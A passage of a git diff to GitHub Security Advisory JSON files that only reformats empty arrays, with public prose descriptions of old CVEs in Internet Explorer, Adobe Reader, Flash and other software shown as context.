b/advisories/unreviewed/2022/05/GHSA-m67w-v6pq-c7w8/GHSA-m67w-v6pq-c7w8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-m6h3-wqpq-fwhc/GHSA-m6h3-wqpq-fwhc.json b/advisories/unreviewed/2022/05/GHSA-m6h3-wqpq-fwhc/GHSA-m6h3-wqpq-fwhc.json index 70359d716b8..04b4d0dc175 100644 --- a/advisories/unreviewed/2022/05/GHSA-m6h3-wqpq-fwhc/GHSA-m6h3-wqpq-fwhc.json +++ b/advisories/unreviewed/2022/05/GHSA-m6h3-wqpq-fwhc/GHSA-m6h3-wqpq-fwhc.json @@ -7,12 +7,8 @@ "CVE-2013-6913" ], "details": "Cross-site scripting (XSS) vulnerability in a search component in Cybozu Garoon before 3.7.2, when Internet Explorer is used, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m6v4-6xq7-98mv/GHSA-m6v4-6xq7-98mv.json b/advisories/unreviewed/2022/05/GHSA-m6v4-6xq7-98mv/GHSA-m6v4-6xq7-98mv.json index edb24aa6bef..40803aebb20 100644 --- a/advisories/unreviewed/2022/05/GHSA-m6v4-6xq7-98mv/GHSA-m6v4-6xq7-98mv.json +++ b/advisories/unreviewed/2022/05/GHSA-m6v4-6xq7-98mv/GHSA-m6v4-6xq7-98mv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-m866-w447-773f/GHSA-m866-w447-773f.json b/advisories/unreviewed/2022/05/GHSA-m866-w447-773f/GHSA-m866-w447-773f.json index e152a57042b..20657d67814 100644 --- a/advisories/unreviewed/2022/05/GHSA-m866-w447-773f/GHSA-m866-w447-773f.json +++ b/advisories/unreviewed/2022/05/GHSA-m866-w447-773f/GHSA-m866-w447-773f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mcgf-p4mp-v794/GHSA-mcgf-p4mp-v794.json b/advisories/unreviewed/2022/05/GHSA-mcgf-p4mp-v794/GHSA-mcgf-p4mp-v794.json index 712a8aa0dd5..87a39f0ef86 100644 --- a/advisories/unreviewed/2022/05/GHSA-mcgf-p4mp-v794/GHSA-mcgf-p4mp-v794.json +++ b/advisories/unreviewed/2022/05/GHSA-mcgf-p4mp-v794/GHSA-mcgf-p4mp-v794.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -59,9 +57,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mgmj-3x8r-9rwj/GHSA-mgmj-3x8r-9rwj.json b/advisories/unreviewed/2022/05/GHSA-mgmj-3x8r-9rwj/GHSA-mgmj-3x8r-9rwj.json index 771f60c8551..002a589d422 100644 --- a/advisories/unreviewed/2022/05/GHSA-mgmj-3x8r-9rwj/GHSA-mgmj-3x8r-9rwj.json +++ b/advisories/unreviewed/2022/05/GHSA-mgmj-3x8r-9rwj/GHSA-mgmj-3x8r-9rwj.json @@ -7,12 +7,8 @@ "CVE-2008-7220" ], "details": "Unspecified vulnerability in Prototype JavaScript framework (prototypejs) before 1.6.0.2 allows attackers to make \"cross-site ajax requests\" via unknown vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -100,9 +96,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mh8f-3q3j-jrqw/GHSA-mh8f-3q3j-jrqw.json b/advisories/unreviewed/2022/05/GHSA-mh8f-3q3j-jrqw/GHSA-mh8f-3q3j-jrqw.json index 90bc6430e59..63f4579271d 100644 --- a/advisories/unreviewed/2022/05/GHSA-mh8f-3q3j-jrqw/GHSA-mh8f-3q3j-jrqw.json +++ b/advisories/unreviewed/2022/05/GHSA-mh8f-3q3j-jrqw/GHSA-mh8f-3q3j-jrqw.json @@ -7,12 +7,8 @@ "CVE-2015-4445" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-4435, CVE-2015-4438, CVE-2015-4441, CVE-2015-4447, CVE-2015-4451, CVE-2015-4452, CVE-2015-5085, and CVE-2015-5086.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mj6r-fxqr-4c2f/GHSA-mj6r-fxqr-4c2f.json b/advisories/unreviewed/2022/05/GHSA-mj6r-fxqr-4c2f/GHSA-mj6r-fxqr-4c2f.json index 3b6049868ae..537ffd33d74 100644 --- a/advisories/unreviewed/2022/05/GHSA-mj6r-fxqr-4c2f/GHSA-mj6r-fxqr-4c2f.json +++ b/advisories/unreviewed/2022/05/GHSA-mj6r-fxqr-4c2f/GHSA-mj6r-fxqr-4c2f.json @@ -7,12 +7,8 @@ "CVE-2012-1876" ], "details": "Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by attempting to access a nonexistent object, leading to a heap-based buffer overflow, aka \"Col Element Remote Code Execution Vulnerability,\" as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2012.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mjfq-xmf5-hv6p/GHSA-mjfq-xmf5-hv6p.json b/advisories/unreviewed/2022/05/GHSA-mjfq-xmf5-hv6p/GHSA-mjfq-xmf5-hv6p.json index eb0543e6457..4c60970b1e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-mjfq-xmf5-hv6p/GHSA-mjfq-xmf5-hv6p.json +++ b/advisories/unreviewed/2022/05/GHSA-mjfq-xmf5-hv6p/GHSA-mjfq-xmf5-hv6p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mm4r-5hp7-v6q3/GHSA-mm4r-5hp7-v6q3.json b/advisories/unreviewed/2022/05/GHSA-mm4r-5hp7-v6q3/GHSA-mm4r-5hp7-v6q3.json index 808bc00bcab..94fffe96b37 100644 --- a/advisories/unreviewed/2022/05/GHSA-mm4r-5hp7-v6q3/GHSA-mm4r-5hp7-v6q3.json +++ b/advisories/unreviewed/2022/05/GHSA-mm4r-5hp7-v6q3/GHSA-mm4r-5hp7-v6q3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mp37-3w38-3hmx/GHSA-mp37-3w38-3hmx.json b/advisories/unreviewed/2022/05/GHSA-mp37-3w38-3hmx/GHSA-mp37-3w38-3hmx.json index bab97b61552..8be449a5907 100644 --- a/advisories/unreviewed/2022/05/GHSA-mp37-3w38-3hmx/GHSA-mp37-3w38-3hmx.json +++ b/advisories/unreviewed/2022/05/GHSA-mp37-3w38-3hmx/GHSA-mp37-3w38-3hmx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mp84-pg4p-36qc/GHSA-mp84-pg4p-36qc.json b/advisories/unreviewed/2022/05/GHSA-mp84-pg4p-36qc/GHSA-mp84-pg4p-36qc.json index 46b7c4b82b9..c8a82069493 100644 --- a/advisories/unreviewed/2022/05/GHSA-mp84-pg4p-36qc/GHSA-mp84-pg4p-36qc.json +++ b/advisories/unreviewed/2022/05/GHSA-mp84-pg4p-36qc/GHSA-mp84-pg4p-36qc.json @@ -7,12 +7,8 @@ "CVE-2012-2037" ], "details": "Adobe Flash Player before 10.3.183.20 and 11.x before 11.3.300.257 on Windows and Mac OS X; before 10.3.183.20 and 11.x before 11.2.202.236 on Linux; before 11.1.111.10 on Android 2.x and 3.x; and before 11.1.115.9 on Android 4.x, and Adobe AIR before 3.3.0.3610, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-2034.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mp86-7hpx-2vcw/GHSA-mp86-7hpx-2vcw.json b/advisories/unreviewed/2022/05/GHSA-mp86-7hpx-2vcw/GHSA-mp86-7hpx-2vcw.json index 8f32703adaf..3f3c05ebce6 100644 --- a/advisories/unreviewed/2022/05/GHSA-mp86-7hpx-2vcw/GHSA-mp86-7hpx-2vcw.json +++ b/advisories/unreviewed/2022/05/GHSA-mp86-7hpx-2vcw/GHSA-mp86-7hpx-2vcw.json @@ -7,12 +7,8 @@ "CVE-2015-6704" ], "details": "The animations property implementation in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to obtain sensitive information from process memory via a function call, a different vulnerability than CVE-2015-6697, CVE-2015-6699, CVE-2015-6700, CVE-2015-6701, CVE-2015-6702, and CVE-2015-6703.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mphv-4vqv-3v34/GHSA-mphv-4vqv-3v34.json b/advisories/unreviewed/2022/05/GHSA-mphv-4vqv-3v34/GHSA-mphv-4vqv-3v34.json index 00c095cfc5e..6743688f89d 100644 --- a/advisories/unreviewed/2022/05/GHSA-mphv-4vqv-3v34/GHSA-mphv-4vqv-3v34.json +++ b/advisories/unreviewed/2022/05/GHSA-mphv-4vqv-3v34/GHSA-mphv-4vqv-3v34.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mq7w-4q42-qr7m/GHSA-mq7w-4q42-qr7m.json b/advisories/unreviewed/2022/05/GHSA-mq7w-4q42-qr7m/GHSA-mq7w-4q42-qr7m.json index 2d73f152eb0..c0847bfc506 100644 --- a/advisories/unreviewed/2022/05/GHSA-mq7w-4q42-qr7m/GHSA-mq7w-4q42-qr7m.json +++ b/advisories/unreviewed/2022/05/GHSA-mq7w-4q42-qr7m/GHSA-mq7w-4q42-qr7m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mqhr-f34x-gw3r/GHSA-mqhr-f34x-gw3r.json b/advisories/unreviewed/2022/05/GHSA-mqhr-f34x-gw3r/GHSA-mqhr-f34x-gw3r.json index 9b8ce82147f..a371b34649c 100644 --- a/advisories/unreviewed/2022/05/GHSA-mqhr-f34x-gw3r/GHSA-mqhr-f34x-gw3r.json +++ b/advisories/unreviewed/2022/05/GHSA-mqhr-f34x-gw3r/GHSA-mqhr-f34x-gw3r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mr7q-8c5m-vw8x/GHSA-mr7q-8c5m-vw8x.json b/advisories/unreviewed/2022/05/GHSA-mr7q-8c5m-vw8x/GHSA-mr7q-8c5m-vw8x.json index 68932c3e550..f9be97ac798 100644 --- a/advisories/unreviewed/2022/05/GHSA-mr7q-8c5m-vw8x/GHSA-mr7q-8c5m-vw8x.json +++ b/advisories/unreviewed/2022/05/GHSA-mr7q-8c5m-vw8x/GHSA-mr7q-8c5m-vw8x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mr95-v9f6-rhv6/GHSA-mr95-v9f6-rhv6.json b/advisories/unreviewed/2022/05/GHSA-mr95-v9f6-rhv6/GHSA-mr95-v9f6-rhv6.json index 6ff97ab08ff..05e184c8f6c 100644 --- a/advisories/unreviewed/2022/05/GHSA-mr95-v9f6-rhv6/GHSA-mr95-v9f6-rhv6.json +++ b/advisories/unreviewed/2022/05/GHSA-mr95-v9f6-rhv6/GHSA-mr95-v9f6-rhv6.json @@ -7,12 +7,8 @@ "CVE-2015-4449" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2014-8450, CVE-2015-4450, CVE-2015-5088, CVE-2015-5089, and CVE-2015-5092.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mrwc-m279-7475/GHSA-mrwc-m279-7475.json b/advisories/unreviewed/2022/05/GHSA-mrwc-m279-7475/GHSA-mrwc-m279-7475.json index 873dd634667..7090cb54c53 100644 --- a/advisories/unreviewed/2022/05/GHSA-mrwc-m279-7475/GHSA-mrwc-m279-7475.json +++ b/advisories/unreviewed/2022/05/GHSA-mrwc-m279-7475/GHSA-mrwc-m279-7475.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mv7p-p49m-wf4m/GHSA-mv7p-p49m-wf4m.json b/advisories/unreviewed/2022/05/GHSA-mv7p-p49m-wf4m/GHSA-mv7p-p49m-wf4m.json index 2c61b0d64dc..7cbd7104bf2 100644 --- a/advisories/unreviewed/2022/05/GHSA-mv7p-p49m-wf4m/GHSA-mv7p-p49m-wf4m.json +++ b/advisories/unreviewed/2022/05/GHSA-mv7p-p49m-wf4m/GHSA-mv7p-p49m-wf4m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mw75-2q68-55f6/GHSA-mw75-2q68-55f6.json b/advisories/unreviewed/2022/05/GHSA-mw75-2q68-55f6/GHSA-mw75-2q68-55f6.json index fbb1a40e9af..cc399c46d77 100644 --- a/advisories/unreviewed/2022/05/GHSA-mw75-2q68-55f6/GHSA-mw75-2q68-55f6.json +++ b/advisories/unreviewed/2022/05/GHSA-mw75-2q68-55f6/GHSA-mw75-2q68-55f6.json @@ -7,12 +7,8 @@ "CVE-2010-3331" ], "details": "Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory in certain circumstances involving use of Microsoft Word to read Word documents, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka \"Uninitialized Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mx2h-vvvg-h766/GHSA-mx2h-vvvg-h766.json b/advisories/unreviewed/2022/05/GHSA-mx2h-vvvg-h766/GHSA-mx2h-vvvg-h766.json index 5a658917287..3f28ac984ec 100644 --- a/advisories/unreviewed/2022/05/GHSA-mx2h-vvvg-h766/GHSA-mx2h-vvvg-h766.json +++ b/advisories/unreviewed/2022/05/GHSA-mx2h-vvvg-h766/GHSA-mx2h-vvvg-h766.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-mx8g-6g6q-2p9c/GHSA-mx8g-6g6q-2p9c.json b/advisories/unreviewed/2022/05/GHSA-mx8g-6g6q-2p9c/GHSA-mx8g-6g6q-2p9c.json index 80a220a5ed8..555406e1b3c 100644 --- a/advisories/unreviewed/2022/05/GHSA-mx8g-6g6q-2p9c/GHSA-mx8g-6g6q-2p9c.json +++ b/advisories/unreviewed/2022/05/GHSA-mx8g-6g6q-2p9c/GHSA-mx8g-6g6q-2p9c.json @@ -7,12 +7,8 @@ "CVE-2011-1345" ], "details": "Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, as demonstrated by Stephen Fewer as the first of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011, aka \"Object Management Memory Corruption Vulnerability.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-p2x2-g9q4-v9rm/GHSA-p2x2-g9q4-v9rm.json b/advisories/unreviewed/2022/05/GHSA-p2x2-g9q4-v9rm/GHSA-p2x2-g9q4-v9rm.json index 436517089f3..0087404f7f7 100644 --- a/advisories/unreviewed/2022/05/GHSA-p2x2-g9q4-v9rm/GHSA-p2x2-g9q4-v9rm.json +++ b/advisories/unreviewed/2022/05/GHSA-p2x2-g9q4-v9rm/GHSA-p2x2-g9q4-v9rm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p4fm-mppm-v7m5/GHSA-p4fm-mppm-v7m5.json b/advisories/unreviewed/2022/05/GHSA-p4fm-mppm-v7m5/GHSA-p4fm-mppm-v7m5.json index 92745579752..195b0e13ea2 100644 --- a/advisories/unreviewed/2022/05/GHSA-p4fm-mppm-v7m5/GHSA-p4fm-mppm-v7m5.json +++ b/advisories/unreviewed/2022/05/GHSA-p4fm-mppm-v7m5/GHSA-p4fm-mppm-v7m5.json @@ -7,12 +7,8 @@ "CVE-2010-3324" ], "details": "The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka \"HTML Sanitization Vulnerability,\" a different vulnerability than CVE-2010-1257.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p5pc-pcfq-64rw/GHSA-p5pc-pcfq-64rw.json b/advisories/unreviewed/2022/05/GHSA-p5pc-pcfq-64rw/GHSA-p5pc-pcfq-64rw.json index db5b7522db1..6d941f5a38d 100644 --- a/advisories/unreviewed/2022/05/GHSA-p5pc-pcfq-64rw/GHSA-p5pc-pcfq-64rw.json +++ b/advisories/unreviewed/2022/05/GHSA-p5pc-pcfq-64rw/GHSA-p5pc-pcfq-64rw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p698-23j9-7m74/GHSA-p698-23j9-7m74.json b/advisories/unreviewed/2022/05/GHSA-p698-23j9-7m74/GHSA-p698-23j9-7m74.json index 41dab13ba4b..1bc53d8ebf7 100644 --- a/advisories/unreviewed/2022/05/GHSA-p698-23j9-7m74/GHSA-p698-23j9-7m74.json +++ b/advisories/unreviewed/2022/05/GHSA-p698-23j9-7m74/GHSA-p698-23j9-7m74.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p6hq-65m2-r4jg/GHSA-p6hq-65m2-r4jg.json b/advisories/unreviewed/2022/05/GHSA-p6hq-65m2-r4jg/GHSA-p6hq-65m2-r4jg.json index bee2893b8dd..60588f8c819 100644 --- a/advisories/unreviewed/2022/05/GHSA-p6hq-65m2-r4jg/GHSA-p6hq-65m2-r4jg.json +++ b/advisories/unreviewed/2022/05/GHSA-p6hq-65m2-r4jg/GHSA-p6hq-65m2-r4jg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-p9v4-5fvf-9qmw/GHSA-p9v4-5fvf-9qmw.json b/advisories/unreviewed/2022/05/GHSA-p9v4-5fvf-9qmw/GHSA-p9v4-5fvf-9qmw.json index 29a87e0b824..e5f337e0b0d 100644 --- a/advisories/unreviewed/2022/05/GHSA-p9v4-5fvf-9qmw/GHSA-p9v4-5fvf-9qmw.json +++ b/advisories/unreviewed/2022/05/GHSA-p9v4-5fvf-9qmw/GHSA-p9v4-5fvf-9qmw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pc34-c64q-8qxp/GHSA-pc34-c64q-8qxp.json b/advisories/unreviewed/2022/05/GHSA-pc34-c64q-8qxp/GHSA-pc34-c64q-8qxp.json index 7a183c53c43..1b796b1bc61 100644 --- a/advisories/unreviewed/2022/05/GHSA-pc34-c64q-8qxp/GHSA-pc34-c64q-8qxp.json +++ b/advisories/unreviewed/2022/05/GHSA-pc34-c64q-8qxp/GHSA-pc34-c64q-8qxp.json @@ -7,12 +7,8 @@ "CVE-2015-6722" ], "details": "The CBSharedReviewStatusDialog method in Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allows attackers to bypass JavaScript API execution restrictions via unspecified vectors, a different vulnerability than CVE-2015-6707, CVE-2015-6708, CVE-2015-6709, CVE-2015-6710, CVE-2015-6711, CVE-2015-6712, CVE-2015-6713, CVE-2015-6714, CVE-2015-6715, CVE-2015-6716, CVE-2015-6717, CVE-2015-6718, CVE-2015-6719, CVE-2015-6720, CVE-2015-6721, CVE-2015-6723, CVE-2015-6724, CVE-2015-6725, CVE-2015-7614, CVE-2015-7616, CVE-2015-7618, CVE-2015-7619, CVE-2015-7620, and CVE-2015-7623.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-pcf7-fwpx-5mr2/GHSA-pcf7-fwpx-5mr2.json b/advisories/unreviewed/2022/05/GHSA-pcf7-fwpx-5mr2/GHSA-pcf7-fwpx-5mr2.json index 128c03ffde6..ade0bdb5a4a 100644 --- a/advisories/unreviewed/2022/05/GHSA-pcf7-fwpx-5mr2/GHSA-pcf7-fwpx-5mr2.json +++ b/advisories/unreviewed/2022/05/GHSA-pcf7-fwpx-5mr2/GHSA-pcf7-fwpx-5mr2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pchq-c3mq-f643/GHSA-pchq-c3mq-f643.json b/advisories/unreviewed/2022/05/GHSA-pchq-c3mq-f643/GHSA-pchq-c3mq-f643.json index 32e8b880011..f395828f834 100644 --- a/advisories/unreviewed/2022/05/GHSA-pchq-c3mq-f643/GHSA-pchq-c3mq-f643.json +++ b/advisories/unreviewed/2022/05/GHSA-pchq-c3mq-f643/GHSA-pchq-c3mq-f643.json @@ -7,12 +7,8 @@ "CVE-2015-6705" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.16 and 11.x before 11.0.13, Acrobat and Acrobat Reader DC Classic before 2015.006.30094, and Acrobat and Acrobat Reader DC Continuous before 2015.009.20069 on Windows and OS X allow attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2015-5583, CVE-2015-6706, and CVE-2015-7624.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pfgp-c8ff-xcvx/GHSA-pfgp-c8ff-xcvx.json b/advisories/unreviewed/2022/05/GHSA-pfgp-c8ff-xcvx/GHSA-pfgp-c8ff-xcvx.json index 51e59ad0a91..8634fc62d27 100644 --- a/advisories/unreviewed/2022/05/GHSA-pfgp-c8ff-xcvx/GHSA-pfgp-c8ff-xcvx.json +++ b/advisories/unreviewed/2022/05/GHSA-pfgp-c8ff-xcvx/GHSA-pfgp-c8ff-xcvx.json @@ -7,12 +7,8 @@ "CVE-2015-2873" ], "details": "Trend Micro Deep Discovery Inspector (DDI) on Deep Discovery Threat appliances with software before 3.5.1477, 3.6.x before 3.6.1217, 3.7.x before 3.7.1248, 3.8.x before 3.8.1263, and other versions allows remote attackers to obtain sensitive information or change the configuration via a direct request to the (1) system log URL, (2) whitelist URL, or (3) blacklist URL.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pg2w-f8j8-f6qq/GHSA-pg2w-f8j8-f6qq.json b/advisories/unreviewed/2022/05/GHSA-pg2w-f8j8-f6qq/GHSA-pg2w-f8j8-f6qq.json index 1bc9c79341a..627e2179176 100644 --- a/advisories/unreviewed/2022/05/GHSA-pg2w-f8j8-f6qq/GHSA-pg2w-f8j8-f6qq.json +++ b/advisories/unreviewed/2022/05/GHSA-pg2w-f8j8-f6qq/GHSA-pg2w-f8j8-f6qq.json @@ -7,12 +7,8 @@ "CVE-2015-5107" ], "details": "Adobe Reader and Acrobat 10.x before 10.1.15 and 11.x before 11.0.12, Acrobat and Acrobat Reader DC Classic before 2015.006.30060, and Acrobat and Acrobat Reader DC Continuous before 2015.008.20082 on Windows and OS X allow attackers to obtain sensitive information via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-pg8v-h97g-2jwh/GHSA-pg8v-h97g-2jwh.json b/advisories/unreviewed/2022/05/GHSA-pg8v-h97g-2jwh/GHSA-pg8v-h97g-2jwh.json index 9ec963fa688..ba20aa9208c 100644 --- a/advisories/unreviewed/2022/05/GHSA-pg8v-h97g-2jwh/GHSA-pg8v-h97g-2jwh.json +++ b/advisories/unreviewed/2022/05/GHSA-pg8v-h97g-2jwh/GHSA-pg8v-h97g-2jwh.json @@ -7,12 +7,8 